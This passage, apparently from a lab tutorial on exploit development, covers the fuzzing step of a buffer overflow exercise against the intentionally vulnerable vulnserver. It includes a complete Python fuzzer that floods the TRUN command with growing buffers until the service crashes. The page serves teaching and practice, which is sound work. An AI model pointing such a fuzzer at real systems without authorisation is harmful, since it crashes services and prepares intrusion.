Step 1: Fuzzing
AAAAAAAA
Restart vulnserver by pressing Ctrl+F2 in Immunity Debugger and then run it by pressing F9. Run the fuzzer to crash the executable's TRUN
command:
#!/usr/bin/python3
import sys, socket
from time import sleep
#--------Changeme--------#
#
host = "192.168.1.2" #
port = 9999 #
#
#------------------------#
buffer = b"A" * 100
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
payload = b"TRUN /.:/" + buffer
print(f"[+] Sending the payload of length {len(buffer)}...")
s.send(payload)
s.close()
sleep(1)
buffer += b"A" * 100
except:
print(f"Fuzzer crashed at {len(buffer)} bytes")
sys.exit()
Here we should manually encode everything with b""
instead of using .encode()
since .encode()
turns a byte into its Unicode representation:

After a while, vulnserver crashes:

Here we learn that the offset is less than 3000 bytes. We only want to know an approximate value in this step, and we will figure out the exact offset in the next step.
Last updated
Was this helpful?